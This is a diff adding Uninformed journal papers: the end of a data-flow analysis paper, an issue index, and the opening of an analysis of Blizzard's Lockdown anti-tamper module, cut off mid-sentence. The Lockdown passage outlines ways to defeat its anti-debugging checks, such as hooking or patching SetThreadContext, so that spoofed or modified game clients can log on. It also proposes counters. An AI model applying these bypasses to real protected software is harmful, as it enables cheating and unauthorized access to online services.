+between the source and sink flow descriptor at the module tier. In this case,
+only the edges between the nodes highlighted in dark orange are found to be
+involved in reachable paths between fout(System.Web) and fin(System). The
+important thing to note is that even at the module tier, a data flow path is
+illustrated between fin(WebClient) and fin(WebService). This trend continues
+at each more specific generalization tier.
+
+3.3) Data Type Tier
+
+The data type tier uses the set of data flow paths found at the module tier to
+construct a data flow graph that shows the data flow relationships between
+formal input and formal output parameters passed between data types. The
+graph is generated using the one-to-many table that was populated during
+generalization, which conveys the data type data flow paths that were
+generalized by the set of qualified module data flow paths. The graph that is
+generated as a result is shown in figure 16.
+
+                 [Figure 16: data type tier data flow graph]
+
+Using the graph, the Reachability() algorithm is again employed to find paths
+between the source and sink flow descriptor at the data type tier. Due to the
+simplicity of the example application, only a few data flow paths were
+rendered. The complete data flow path from fout(System.Web.HttpRequest) to
+fin(System.Diagnostics.Process.Start) can be clearly seen.
+
+3.4) Procedure Tier
+
+The procedure tier uses the set of data flow paths found at the data type tier
+to construct a data flow graph that shows the data flow relationships between
+formal input and formal output parameters passed between procedures. Unlike
+previous tiers, procedure tier data flow paths explicitly identify the formal
+parameter index that data is being passed to. This helps to further isolate
+data flow paths from one another and improves the overall accuracy of paths
+that are selected. The graph is generated using the one-to-many table that
+was populated during generalization, which conveys the procedure data flow
+paths that were generalized by the set of qualified data type data flow paths.
+The graph that is generated as a result is shown in figure 17.
+
+                 [Figure 17: procedure tier data flow graph]
+
+Using the graph, the Reachability() algorithm is again employed to find paths
+between the source and sink flow descriptor at the procedure tier. Due to the
+simplicity of the example application, only a few data flow paths were
+rendered. The complete data flow path from fout(get_QueryString, 0) to
+fin(Start, 0) can be clearly seen.
+
+3.5) Basic Block Tier
+
+The basic block tier uses the set of data flow paths found at the procedure
+tier to construct a data flow graph that shows the data flow relationships
+between formal input and formal output parameters passed between basic blocks.
+Like the procedure tier, basic block tier data flow paths also explicitly
+identify the formal parameter index that data is being passed to. The graph
+is generated using the one-to-many table that was populated during
+generalization, which conveys the basic block data flow paths that were
+generalized by the set of qualified procedure data flow paths. The graph that
+is generated as a result is shown in figure 18. Due to the way that Phoenix
+currently represents basic blocks, the basic block tier data flow paths offer
+very little generalization beyond the instruction tier.
+
+               [Figure 18: basic block tier data flow graph]
+
+Using the graph, the Reachability() algorithm is again employed to find paths
+between the source and sink flow descriptor at the basic block tier. Due to
+the simplicity of the example application, only a few data flow paths were
+rendered. The complete data flow path from fout(get_QueryString, 0) to
+fin(Start, 0) can be clearly seen.
+
+3.6) Instruction Tier
+
+The instruction tier uses the set of data flow paths found at the basic block
+tier to construct a data flow graph that shows the data flow relationships
+between formal input and formal output parameters passed between instructions.
+Like the basic block tier, instruction tier data flow paths also explicitly
+identify the formal parameter index that data is being passed to. The graph
+is generated using the one-to-many table that was populated during
+generalization, which conveys the instruction data flow paths that were
+generalized by the set of qualified basic block data flow paths. The graph
+that is generated as a result is shown in figure 19. The instruction tier
+data flow paths represent the final step taken by the algorithm, as they
+contain the most specific description of data flow paths.
+
+               [Figure 19: instruction tier data flow graph]
+
+Using the graph, the Reachability() algorithm is again employed to find paths
+between the source and sink flow descriptor at the instruction tier. Due to
+the simplicity of the example application, only a few data flow paths were
+rendered. The complete data flow path from fout(get_QueryString, 0) to
+fin(Start, 0) can be clearly seen along with source lines that are encountered
+along the way.
+
+4) Acknowledgements
+
+The author would like to thank Rolf Rolles, Richard Johnson, Halvar Flake,
+Jordan Hind, and many others for thoughtful discussions and feedback.
+
+5) Conclusion
+
+This document has attempted to convey the potential benefits of generalizing
+data flow information along generalization tiers. Each generalization tier is
+used to represent the data flow behaviors of an abstract or concrete software
+element such as an instruction, basic block, procedure, and so on. Using this
+concept, data flow information can be collected at the most specific tier, the
+instruction tier, and then generalized to increasingly less-specific tiers.
+The generalization process has the effect of reducing the amount of data that
+must be considered at once while still conveying a general description of the
+manner in which data flows within an application.
+
+Generalized data flow information can be immediately used in conjunction with
+existing graph reachability problems.
+For instance, a common task that involves determining reachable data flow
+paths between a conceptual source and sink location within an application can
+potentially benefit from operating on generalized data flow information. This
+paper has illustrated these potential benefits by defining the Progressive
+Qualified Elaboration (PQE) algorithm, which can be used to progressively
+determine reachability at each generalization tier. By starting at the least
+specific generalization tier and progressing toward the most specific, it is
+possible to restrict the amount of data flow information that must be
+considered at once to a minimal set. This is accomplished by using reachable
+paths found at each generalization tier to qualify the set of data flow paths
+that must be considered at more specific generalization tiers.
+
+While these benefits are thought to be present, the author has yet to
+conclusively prove this to be the case. The results presented in this paper
+do not prove the presumed usefulness of generalizing data flow information
+beyond the procedure tier. The author believes that analysis of large
+applications involving hundreds of modules could benefit from generalizing
+data flow information to the data type, module, and more abstract tiers.
+However, at the time of this writing, conclusive data has not been
+collected to prove this usefulness. The author hopes to collect
+information that either confirms or refutes this point during future
+research.
+
+At present, the underlying implementation used to generate the results
+described in this paper has a number of known limitations. The first
+limitation is that it does not currently take into account formal parameters
+that are not passed at a call site, such as fields, global variables, and so
+on. This significantly restricts the accuracy of the data flow model that it
+is currently capable of generating. This limitation represents a more general
+problem of needing to better refine the underlying completeness of the data
+flow information that is captured.
+
+While the algorithms presented in this paper were portrayed in the context of
+data flow analysis, it is entirely possible to apply them to other fields as
+well, such as control flow analysis. The PQE algorithm itself is conceptually
+generic in that it simply describes a process that can be employed to qualify
+the next set of analysis information that must be considered from a more
+generic set of analysis information. This may facilitate future research
+directions.
+
+References
+
+[1] Atkinson, Griswold. Implementation Techniques for Efficient Data-flow Analysis of Large Programs.
+    Proceedings of the IEEE International Conference on Software Maintenance (ICSM'01). 2001.
+    http://www.cse.scu.edu/~atkinson/papers/icsm-01.ps
+
+[2] Das, M. Static Analysis of Large Programs: Some Experiences.
+    2000. http://research.microsoft.com/manuvir/Talks/pepm00.ppt
+
+[3] Das, M., Lerner, S., Seigle, M. ESP: Path-Sensitive Program Verification in Polynomial Time.
+    Proceedings of the SIGPLAN 2002 Conference on Programming Language Design. 2002.
+    http://www.cs.cornell.edu/courses/cs711/2005fa/papers/dls-pldi02.pdf
+
+[4] Das, M., Fahndrich, M., Rehof, J. From Polymorphic Subtyping to CFL Reachability: Context-Sensitive Flow Analysis Using Instantiation Constraints. 2000.
+    http://research.microsoft.com/research/pubs/view.aspx?msr_tr_id=MSR-TR-99-84
+
+[5] Dinakar Dhurjati, Manuvir Das, and Yue Yang.
+    Path-Sensitive Dataflow Analysis with Iterative Refinement.
+    SAS'06: The 13th International Static Analysis Symposium, Seoul, August 2006.
+
+[6] Erikson, Manocha. Simplification Culling of Static and Dynamic Scene Graphs.
+    TR9809-009, University of North Carolina at Chapel Hill. 1998.
+    citeseer.ist.psu.edu/erikson98simplification.html
+
+[7] Horwitz, S., Reps, T., and Binkley, D., Interprocedural slicing using dependence graphs.
+    In Proceedings of the ACM SIGPLAN 88 Conference on Programming Language Design and Implementation,
+    (Atlanta, GA, June 22-24, 1988), ACM SIGPLAN Notices 23, 7 (July 1988), pp. 35-46.
+
+[8] Horwitz, S., Reps, T., and Binkley, D., Retrospective: Interprocedural slicing using dependence graphs.
+    20 Years of the ACM SIGPLAN Conference on Programming Language Design and Implementation (1979 - 1999):
+    A Selection, K.S. McKinley, ed., ACM SIGPLAN Notices 39, 4 (April 2004), 229-231.
+
+[9] Gregor, D., Schupp, S. Retaining Path-Sensitive Relations across Control Flow Merges.
+    Technical report 03-15, Rensselaer Polytechnic Institute, November 2003.
+    http://www.cs.rpi.edu/research/ps/03-15.ps
+
+[10] Kiss, Jász, Lehotai, Gyimóthy. Interprocedural Static Slicing of Binary Executables.
+    http://www.inf.u-szeged.hu/~akiss/pub/kiss_interprocedural.pdf
+
+[11] Microsoft Corporation. Phoenix Framework.
+    http://research.microsoft.com/phoenix/
+
+[12] Naumovich, G., Avrunin, G. S., and Clarke, L. A. 1999.
+    Data flow analysis for checking properties of concurrent Java programs.
+    In Proceedings of the 21st International Conference on Software Engineering
+    (Los Angeles, California, United States, May 16 - 22, 1999).
+    International Conference on Software Engineering.
+    IEEE Computer Society Press, Los Alamitos, CA, 399-410.
+
+[13] Reps, T., Horwitz, S., and Sagiv, M., Precise interprocedural dataflow analysis via graph reachability.
+    In Conference Record of the 22nd ACM Symposium on Principles of Programming Languages,
+    (San Francisco, CA, Jan. 23-25, 1995), pp. 49-61.
+
+[14] Reps, T., Sagiv, M., and Horwitz, S., Interprocedural dataflow analysis via graph reachability.
+    TR 94-14, Datalogisk Institut, University of Copenhagen, Copenhagen, Denmark, April 1994.
+
+[15] A. Rountev, B. G. Ryder, and W. Landi. Dataflow analysis of program fragments.
+    In Proc. Symp. Foundations of Software Engineering, LNCS 1687, pages 235--252, 1999.
+    http://citeseer.ist.psu.edu/rountev99dataflow.html
+
+[16] Schultes, Dominik. Fast and Exact Shortest Path Queries Using Highway Hierarchies. 2005.
+    http://algo2.iti.uka.de/schultes/hwy/hwyHierarchies.pdf
diff --git a/uninformed/8.txt b/uninformed/8.txt
new file mode 100644
index 0000000..893a1ba
--- /dev/null
+++ b/uninformed/8.txt
@@ -0,0 +1,22 @@
+Engineering in Reverse
+An Objective Analysis of the Lockdown Protection System for Battle.net
+Skywing
+Near the end of 2006, Blizzard deployed the first major update to the version check and client software authentication system used to verify the authenticity of clients connecting to Battle.net using the binary game client protocol. This system had been in use since just after the release of the original Diablo game and the public launch of Battle.net. The new authentication module (Lockdown) introduced a variety of mechanisms designed to raise the bar with respect to spoofing a game client when logging on to Battle.net. In addition, the new authentication module also introduced run-time integrity checks of client binaries in memory.
This is meant to provide simple detection of many client modifications (often labeled "hacks") that patch game code in-memory in order to modify game behavior. The Lockdown authentication module also introduced some anti-debugging techniques that are designed to make it more difficult to reverse engineer the module. In addition, several checks that are designed to make it difficult to simply load and run the Blizzard Lockdown module from the context of an unauthorized, non-Blizzard-game process. After all, if an attacker can simply load and run the Lockdown module in his or her own process, it becomes trivially easy to spoof the game client logon process, or to allow a modified game client to log on to Battle.net successfully. However, like any protection mechanism, the new Lockdown module is not without its flaws, some of which are discussed in detail in this paper. +html | pdf | txt + +Exploitation Technology +ActiveX - Active Exploitation +warlord +This paper provides a general introduction to the topic of understanding security vulnerabilities that affect ActiveX controls. A brief description of how ActiveX controls are exposed to Internet Explorer is given along with an analysis of three example ActiveX vulnerabilities that have been previously disclosed. +html | pdf | txt + +Context-keyed Payload Encoding +I)ruid +A common goal of payload encoders is to evade a third-party detection mechanism which is actively observing attack traffic somewhere along the route from an attacker to their target, filtering on commonly used payload instructions. The use of a payload encoder may be easily detected and blocked as well as opening up the opportunity for the payload to be decoded for further analysis. Even so-called keyed encoders utilize easily observable, recoverable, or guessable key values in their encoding algorithm, thus making decoding on-the-fly trivial once the encoding algorithm is identified. It is feasible that an active observer may make use of the inherent functionality of the decoder stub to decode the payload of a suspected exploit in order to inspect the contents of that payload and make a control decision about the network traffic. This paper presents a new method of keying an encoder which is based entirely on contextual information that is predictable or known about the target by the attacker and constructible or recoverable by the decoder stub when executed at the target. An active observer of the attack traffic however should be unable to decode the payload due to lack of the contextual keying information. +html | pdf | txt + +Improving Software Security Analysis using Exploitation Properties +skape +Reliable exploitation of software vulnerabilities has continued to become more difficult as formidable mitigations have been established and are now included by default with most modern operating systems. Future exploitation of software vulnerabilities will rely on either discovering ways to circumvent these mitigations or uncovering flaws that are not adequately protected. Since the majority of the mitigations that exist today lack universal bypass techniques, it has become more fruitful to take the latter approach. It is in this vein that this paper introduces the concept of exploitation properties and describes how they can be used to better understand the exploitability of a system irrespective of a particular vulnerability. Perceived exploitability is of utmost importance to both an attacker and to a defender given the presence of modern mitigations. 
The ANI vulnerability (MS07-017) is used to help illustrate these points by acting as a simple example of a vulnerability that may have been more easily identified as code that should have received additional scrutiny by taking exploitation properties into consideration. +html | pdf | txt + diff --git a/uninformed/9.1.txt b/uninformed/9.1.txt new file mode 100644 index 0000000..e05f1de --- /dev/null +++ b/uninformed/9.1.txt @@ -0,0 +1,639 @@ +An Objective Analysis of the Lockdown Protection System for Battle.net +12/2007 +Skywing +skywing@valhallalegends.com + +Abstract + +Near the end of 2006, Blizzard deployed the first major update to the version +check and client software authentication system used to verify the authenticity +of clients connecting to Battle.net using the binary game client protocol. This +system had been in use since just after the release of the original Diablo +game and the public launch of Battle.net. The new authentication module +(Lockdown) introduced a variety of mechanisms designed to raise the bar with +respect to spoofing a game client when logging on to Battle.net. In addition, +the new authentication module also introduced run-time integrity checks of +client binaries in memory. This is meant to provide simple detection of many +client modifications (often labeled "hacks") that patch game code in-memory in +order to modify game behavior. The Lockdown authentication module also +introduced some anti-debugging techniques that are designed to make it more +difficult to reverse engineer the module. In addition, several checks that +are designed to make it difficult to simply load and run the Blizzard +Lockdown module from the context of an unauthorized, non-Blizzard-game +process. After all, if an attacker can simply load and run the Lockdown +module in his or her own process, it becomes trivially easy to spoof the game +client logon process, or to allow a modified game client to log on to +Battle.net successfully. However, like any protection mechanism, the new +Lockdown module is not without its flaws, some of which are discussed in +detail in this paper. + +1) Introduction + +The Lockdown module is a part of several schemes that attempt to make it +difficult to connect to Battle.net with a client that is not a "genuine" +Blizzard game. For the purposes of this paper, the author considers both +modified/"hacked" Blizzard game clients, and third-party client software, +known as "emubots", as examples of Battle.net clients that are not genuine +Blizzard games. The Battle.net protocol also incorporates a number of schemes +(such as a proprietary mechanism for presenting a valid CD-Key for inspection +by Battle.net, and a non-standard derivative of the SRP password exchange +protocol for account logon) that by virtue of being obscure and undocumented +make it non-trivial for an outsider to successfully log a non-genuine client +on to Battle.net. + +Prior to the launch of the Lockdown module, a different system took its place and +filled the role of validating client software versions. The previous system +was resistant to replay attacks (caveat: a relatively small pool of challenge +response values maintained by servers makes it possible to use replay attacks +after observing a large number of successful logon attempts) by virtue of the +use of a dynamically-supplied checksum formula that is sent to clients (a +challenge, in effect). 
This formula was then interpreted by the predecessor +to the Lockdown module, otherwise known as the "ver" or "ix86ver" module, +and used to create a one-way hash of several key game client binaries. The +result response would then be sent back to the game server for verification, +with an invalid response resulting in the client being denied access to +Battle.net. + +While the "ver" module provides some inherent resistance to some +types of non-genuine clients (such as those that modify Blizzard game binaries +on disk), it does little to stop in-memory modifications to Blizzard game +clients. Additionally, there is very little to stop an attacker from creating +their own client software (an "emubot") that implements the "ver" module's +checksum scheme, either by calling "ver" directly or through the use of a +third-party, reverse-engineered implementation of the algorithm implemented in +the "ver" module. It should be noted that there exists one basic protection +against third party software calling the "ver" module directly; the "ver" +series of modules are designed to always run part of the version check hash on +the caller process image (as returned by the Win32 API GetModuleFileNameA). +This poses a minor annoyance for third party programs. In order to bypass +this protection, however, one need only hook GetModuleFileNameA and fake the +result returned to the "ver" module. + +Given the existing "ver" module's capabilities, the Lockdown module +represents a major step forward in the vein of assuring that only genuine +Blizzard client software can log on to Battle.net as a game client. The +Lockdown module is a first in many respects for Blizzard with respect to +releasing code that actively attempts to thwart analysis via a debugger +(and actively attempts to resist being called in a foreign process with +non-trivial mechanisms). + +Despite the work put into the Lockdown module, however, it has proven perhaps +less effective than originally hoped (though the author cannot state the +definitive expectations for the Lockdown module, it can be assumed that a +"hacking life" of more than several days was an objective of the Lockdown +module). This paper discusses the various major protection systems embedded +into the Lockdown module and associated authentication system, potential +attacks against them, and technical counters to these attacks that Blizzard +could take in a future release of a new version check/authentication module. + +Part of the problem the developers of the Lockdown module faced relates to +constraints on the environment in which the module operates. The author has +derived the following constraints currently in place for the module: + +1. The server portion of the authentication system is likely static and does not + generate challenge/response values in real time. Instead, a pool of possible + values appear to be pregenerated and configured on the server. +2. The module needs to work on all operating systems supported by all Blizzard + games, which spans the gamut from Windows 9x to Windows Vista x64. Note that + there are provisions for different architectures, such as Mac OS, to use a + different system than Windows architectures. +3. The module needs to work on all versions of all Blizzard Battle.net games, + including previous versions. This is due to the fact that the module plays + an integral part in Battle.net's software version control system, and thus + is used on old clients before they can be upgraded. +4. 
Legitimate users should not see a high incidence of false positives, and it
+   is not desirable for false positives to result in automated permanent action
+   against legitimate users (such as account closure).
+
+As an aside, in the author's opinion, the version check and authentication
+system is not intended as a copy protection system for Battle.net, as it does
+nothing to discourage additional copies of genuine Blizzard game software from
+being used on Battle.net. In essence, the version check and authentication
+system is a system that is designed to ensure that only copies of the
+genuine Blizzard game software can log on to Battle.net. Copy protection
+measures on Battle.net are provided through the CD-Key feature, wherein the
+server requires that a user has a valid (and unique) CD-Key (for applicable
+products).
+
+2) Protection Schemes of the Lockdown Module
+
+As a stark contrast to the old "ver" module, the Lockdown module includes a
+number of active defense mechanisms designed to significantly strengthen the
+module's resistance to attack (including analysis, or being tricked into
+providing a "good" response to a challenge on behalf of an untrusted process).
+
+The protection schemes in the Lockdown module can be broken up into several
+categories:
+
+1. Mechanisms to thwart analysis of the Lockdown module itself and the secret
+   algorithm it implements (anti-debugging/anti-reverse-engineering).
+2. Mechanisms to thwart the successful use of Lockdown in a hostile process to
+   generate a "good" response to a challenge from Battle.net (anti-emubot, and
+   by extension anti-hack, where "anti-hack" denotes a counter to modifications
+   of an otherwise genuine Blizzard game client).
+3. Mechanisms to thwart modifications to an otherwise-genuine Blizzard game
+   client that is attempting to log on to Battle.net (anti-hack).
+
+In addition, the Lockdown module is also responsible for implementing a
+reasonable facsimile of the original function of the "ver" module; that is, to
+provide a way to authoritatively validate the version of a genuine Blizzard
+game client, for the purposes of software version control (e.g. the deployment
+of the correct software updates/patches to old versions of genuine Blizzard
+game clients connecting to Battle.net).
+
+In this vein, the following protection schemes are present in the Lockdown
+module and associated authentication system:
+
+2.1) Clearing the Processor Debug Registers
+
+The x86 family of processors includes a set of special registers that are
+designed to assist in the debugging of programs. These registers allow a user
+to cause the processor to stop when a particular memory location is accessed,
+as an instruction fetch, as a data read, or as a data write. This debugging
+facility allows a user (debugger) to set up to four different virtual addresses
+that will trap execution when referenced in a particular way. The use of these
+debug registers to set traps on specific locations is sometimes known as
+"setting a hardware breakpoint", as the processor's dedicated debugging
+support (in-hardware) is being utilized.
+
+Due to their obvious utility to anyone attempting to analyze or reverse
+engineer the Lockdown module, the module actively attempts to disable this
+debugging aid by explicitly zeroing the contents of the key debug registers in
+the context of the thread executing the Lockdown module's version check
+call, CheckRevision.
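+
+A minimal sketch of how such clearing can be performed with the documented
+thread-context APIs is shown below; it illustrates the general technique only
+and is not Blizzard's actual code.
+
+#include <windows.h>
+
+// Illustrative sketch only: zero the x86 debug registers for the current
+// thread using the documented context APIs.
+static void ClearHardwareBreakpoints(void)
+{
+    CONTEXT ctx;
+    ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS;
+
+    if (GetThreadContext(GetCurrentThread(), &ctx)) {
+        ctx.Dr0 = ctx.Dr1 = ctx.Dr2 = ctx.Dr3 = 0; // clear breakpoint addresses
+        ctx.Dr7 = 0;                               // disable all four slots
+        SetThreadContext(GetCurrentThread(), &ctx);
+    }
+}
+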
+All the requisite debug registers are cleared immediately after the call to
+the CheckRevision routine in the Lockdown module is made.
+
+This protection mechanism constitutes an anti-debugging scheme.
+
+2.2) Memory Checksum Performed on the Lockdown Module
+
+The Lockdown module, contrary to the behavior of its predecessor, implements
+a checksum of several key game executable files in-memory instead of on-disk.
+In addition to the checksum over certain game executables, the Lockdown
+module includes itself in the list of modules to be checksummed. This provides
+several immediate benefits:
+
+1. Attempts to set conventional software breakpoints on routines inside the
+   Lockdown module will distort the result of the operation, frustrating
+   reverse engineering attempts. This is due to the fact that so-called
+   software breakpoints are implemented by patching the instruction at the
+   target location with a special instruction (typically `int 3') that causes
+   the processor to break into the debugger. The alteration to the module's
+   executable code in memory causes the checksum to be distorted, as the `int 3'
+   opcode is checksummed instead of the original opcode.
+2. Attempts to bypass other protection mechanisms in the Lockdown module are
+   made more difficult, as an untrusted process that is attempting to cause the
+   Lockdown module to produce correct results via patching out certain other
+   protection mechanisms will, simply by virtue of altering Lockdown code
+   in-memory, inadvertently alter the end result of the checksum operation. The
+   success of this aspect of the memory checksum protection is related to the
+   fact that the Lockdown module attempts to disable hardware breakpoints as
+   well. These two protection mechanisms thus complement each other in a strong
+   fashion, such that a naive attempt to compromise one of the protection
+   schemes would usually be detected by the other scheme. In effect, the result
+   is a rudimentary "defense in depth" approach to software protection schemes
+   that is the hallmark of most relatively successful protection schemes.
+3. The inclusion of the version check module itself in the output of the
+   checksum is entirely new to the version check and client authentication
+   system, and as such poses an additional, unexpected "speed bump" to persons
+   attempting to reimplement the Lockdown algorithm in their own code.
+
+This protection mechanism has characteristics of anti-debugging, anti-hack,
+and anti-emubot systems.
+
+2.3) Hardcoding of Module Base Addresses
+
+As mentioned previously, the Lockdown module now implements a checksum over
+game executables in-memory instead of on-disk. Taking advantage of this
+change, the Lockdown module can hardcode the base address of the main process
+executable at the default address of 0x00400000. This is safe because no
+Blizzard game executable includes base relocation information, and as a result
+will never change from this base address.
+
+By virtue of hardcoding this address, it becomes more difficult for an
+untrusted process to successfully call the Lockdown module. Unless the
+programmer is particularly clever, he or she may not notice that the Lockdown
+module is not actually performing a checksum over the main executable for the
+desired Blizzard game, but instead the main executable of the untrusted process
+(the default base address for executables produced by the Microsoft linker is
+the same 0x00400000 value used in the main executables comprising Blizzard's
+game clients).
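+
+A check in this spirit can be as simple as the following hypothetical
+fragment, which quietly perturbs the checksum state when the loader reports an
+unexpected base address for the main image. The helper and the poison constant
+are made up for illustration; they are not the module's actual logic.
+
+#include <windows.h>
+
+// Hypothetical illustration of a hardcoded base address check; not the
+// actual Lockdown code. Rather than failing loudly, the checksum state is
+// silently poisoned when the main image is not at the expected fixed base.
+static void VerifyMainImageBase(unsigned long *checksumState)
+{
+    const HMODULE kExpectedBase = (HMODULE)0x00400000;
+
+    if (GetModuleHandleA(NULL) != kExpectedBase)
+        *checksumState ^= 0x1BADD00D; // arbitrary illustrative constant
+}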
+
+While it is possible to change the base address of a program at link-time,
+which could be done by a third-party process in an attempt to make it possible
+to map the desired Blizzard main executable at the 0x00400000 address, it is
+difficult to pull this off under Windows NT. This is because the 0x00400000
+address is low in the address space, and the default behavior of the kernel's
+memory manager is to find new addresses for memory allocations starting from
+the bottom of the address space. This means that in virtually all cases, a
+virgin Win32 process will already have an allocation (usually one of the shared
+sections used for communication with CSRSS in the author's experience) that
+overlaps the address range required by the Lockdown module for the main
+executable of the Blizzard game for which a challenge response is being
+computed. While it is possible to change this behavior in the Windows NT
+memory manager and cause allocations to start at the top of the address space
+and search downwards, this is not the default configuration and is also a
+relatively little-known kernel option. The fact that every user's system would
+need to be reconfigured to change the default allocation search preference
+before an untrusted process could reliably map the desired Blizzard game
+executable makes this approach relatively painful for a would-be attacker.
+
+The Lockdown module also ensures that the return value of the
+GetModuleHandleA(0) Win32 API corresponds to 0x00400000, indicating that the
+main process image is based at 0x00400000 as far as the loader is concerned.
+The restriction on the base address of the game main executable module has the
+unfortunate side effect that it will not be possible to take advantage of
+Windows Vista's address space layout randomization (ASLR) exploit mitigation,
+negatively impacting the resistance of Blizzard games to certain classes of
+exploitation that might affect the security of users.
+
+This protection mechanism is primarily considered to be an anti-emubot scheme,
+as it is designed to prevent an untrusted process from successfully calling
+the Lockdown module.
+
+2.4) Video Memory Checksum
+
+Another previously nonexistent component of the version check algorithm that is
+introduced by the Lockdown module is a checksum over the video memory of the
+process calling the Lockdown module. At the point in time when the module
+is invoked by the Blizzard game, the portion of video memory checksummed should
+correspond to part of the "Battle.net" banner in the logon screen for the
+Blizzard game. The Lockdown module is currently only implemented for
+so-called "legacy" game clients, otherwise known as clients that use Battle.snp
+and the Storm Network Provider system for multiplayer access. This includes
+all Battle.net-capable Blizzard games ranging from Diablo I to Starcraft and
+Warcraft II: BNE. Newer games, such as Diablo II, are not supported by the
+Lockdown module.
+
+This represents an additional non-trivial challenge to a would-be attacker.
+Although the contents of the video memory to be checksummed are static, the way
+that the Lockdown module retrieves the video memory pointers is through an
+obfuscated call to several internal Storm routines (SDrawSelectGdiSurface,
+SDrawLockSurface, and SDrawUnlockSurface) that rely on a non-trivial amount of
+internal state initialized by the Blizzard game during startup.
+This makes the use of the internal Storm routines unlikely to simply work
+"out of the box" in an untrusted process that has not gone to the trouble of
+initializing the Storm graphics subsystem and drawing the appropriate data on
+the Storm video surfaces.
+
+This protection mechanism is primarily considered to be an anti-emubot scheme,
+as it is designed to prevent an untrusted process from successfully calling
+the Lockdown module.
+
+2.5) Multiple Flavors of the Lockdown Module
+
+The original "ver" module scheme pioneered a system wherein there were multiple
+downloadable flavors of the version check module to be used by a client. The
+Battle.net server sends the client a tuple of (version check module filename,
+checksum formula and initialization parameters, version check module timestamp)
+that is used in order to version (and download, if necessary) the latest copy
+of the version check module. This mechanism provides for the possibility that
+the Battle.net server could support multiple "flavors" of version check module
+that could be distributed to clients in order to increase the amount of work
+required by anyone seeking to reimplement the version check and authentication
+system.
+
+The original "ver" module and associated authentication scheme in fact utilized
+such a scheme of multiple "ver" modules, and the Lockdown scheme expands upon
+this trend. In the original system, there were 8 possible modules to choose
+from; the Lockdown system, by contrast, expands this to a set of 20
+possibilities. However, the version check modules in both systems are still
+very similar to one another. In both systems, each module has its own unique
+key (a 32-bit value in the "ver" system, and a 64-bit value in the Lockdown
+system) that is used to influence the result of the version check checksum (it
+should be noted that in the Lockdown system, the actual Lockdown module
+itself is in essence a second "key", as the added checksum over the module
+represents an additional adjustment to the final checksum result that changes
+with each Lockdown module). This single difference is disguised by other
+minor, superficial alterations to each module flavor; there are slight
+differences in how module base addresses are retrieved, for instance, as well
+as other superficial differences, such as code being moved between functions
+or functions being re-arranged in the final binary, intended to prevent a
+simple "diff" of two Lockdown modules from revealing the functional
+differences between the said two modules.
+
+This protection mechanism is perhaps best classed as an anti-analysis scheme,
+as it attempts to create more work for anyone attempting to reverse engineer
+the authentication system as a whole.
+
+2.6) Authenticity Check Performed on Lockdown Module Caller
+
+An additional new protection scheme introduced in the Lockdown module is a
+rudimentary check on the authenticity of the caller of the module's export,
+the CheckRevision routine. Specifically, the module attempts to ascertain
+whether the return address of the call to the CheckRevision routine points to a
+code location within the Battle.snp module. If the return pointer for the call
+to CheckRevision is not within the expected range, then an error is
+deliberately introduced into the checksum calculations, ultimately
+invalidating the result returned by the Lockdown module.
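+
+A simplified sketch of this style of caller check is shown below. The helper
+and its use are illustrative only; the real module's logic is more involved
+and is interleaved with the checksum calculation itself.
+
+#include <windows.h>
+#include <psapi.h>
+#include <intrin.h>
+
+// Illustrative sketch of a return-address authenticity check; not the
+// actual Lockdown implementation. Link against psapi.lib.
+static int ReturnAddressWithinModule(void *retAddr, const char *moduleName)
+{
+    HMODULE mod = GetModuleHandleA(moduleName);
+    MODULEINFO info;
+
+    if (mod == NULL ||
+        !GetModuleInformation(GetCurrentProcess(), mod, &info, sizeof(info)))
+        return 0;
+
+    return (ULONG_PTR)retAddr >= (ULONG_PTR)info.lpBaseOfDll &&
+           (ULONG_PTR)retAddr <  (ULONG_PTR)info.lpBaseOfDll + info.SizeOfImage;
+}
+
+// Inside the exported routine, the check might then look like:
+//
+//     if (!ReturnAddressWithinModule(_ReturnAddress(), "Battle.snp"))
+//         checksumState ^= poison;   // quietly corrupt the final result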
+
+3) Attacks (and Counter-Attacks) on the Lockdown System
+
+Though the Lockdown module introduces a number of new defensive mechanisms
+that attempt to thwart would-be attackers, these systems are far from
+fool-proof. There are a number of ways that these defensive systems could be
+attacked (or subverted) by a would-be attacker who wishes to pass the version
+and authentication check in the context of a non-genuine client for purposes of
+logging on to Battle.net. In addition, there are also a variety of different
+ways by which these proposed attacks could be thwarted in a future update to
+the version check and authentication system.
+
+3.1) Interception of SetThreadContext
+
+As previously described, the Lockdown modules attempt to disable the use of
+the processor's complement of debug registers in order to make it difficult
+to utilize so-called hardware breakpoints during the process of reverse
+engineering or analyzing a Lockdown module. This scheme is, at present,
+relatively easily compromised, however.
+
+There are several possible attacks that could be used:
+
+1. Hook the SetThreadContext API and block attempts to disable debug registers
+   (programmatic).
+2. Patch the import address table entry for SetThreadContext in the Lockdown
+   module to point to a custom routine that does nothing (programmatic).
+3. Patch the Lockdown module instruction code to not call SetThreadContext in
+   the first place (programmatic). However, this approach is considered to
+   be generally untenable, due to the memory checksum protection scheme.
+4. Set a conditional breakpoint on `kernel32!SetThreadContext' that re-applies
+   the hardware breakpoint state after the call, or simply alters execution
+   flow to immediately return (debugger).
+
+Depending on whether the attacker wants to make programmatic alterations to the
+behavior of the Lockdown module via hardware breakpoints, or simply wishes
+to observe the behavior of the module in the debugger unperturbed, there are
+several options available.
+
+The suggested counters include techniques such as the following:
+
+1. Verify that the debug registers were really cleared. However, this could
+   simply be patched out as well. More subtle would be to include the value
+   of several debug registers in the checksum calculations, but this would also
+   be fairly obvious to attackers due to the fact that debug registers cannot be
+   directly accessed from user mode and require a call to Get/SetThreadContext,
+   or the underlying NtGet/SetContextThread system calls.
+2. Include additional calls to disable debug register usage in different
+   locations within the Lockdown module. To be most effective, these would
+   need to be inlined and use different means to set the debug register state.
+   For example, one location could use a direct import, another could use a
+   GetProcAddress dynamic import, a third could manually walk the EAT of
+   kernel32 to find the address of SetThreadContext, a fourth could make
+   a call to NtSetContextThread in ntdll, and a fifth could disassemble the
+   opcodes comprising NtSetContextThread, determine the system call ordinal,
+   and make the system call directly (e.g. via `int 2e'). The goal here is to
+   add additional work and eliminate "single points of failure" from the
+   perspective of an attacker seeking to disable the anti-debugging feature.
+   Note that the direct system call approach will require additional work in
+   order to function under Wow64 (e.g. x64 computers running native Windows
+   x64).
+3. Verify that all IAT entries corresponding to kernel32 actually point to the
+   same module in-memory. This is risky, though, as in some cases (such as when
+   the Microsoft application compatibility layer module is in use), these APIs
+   may be legitimately detoured.
+
+3.2) Use of Hardware Breakpoints
+
+Assuming an attacker can compromise the anti-debugging protection scheme, he
+or she is free to make clever use of hardware breakpoints to disable other
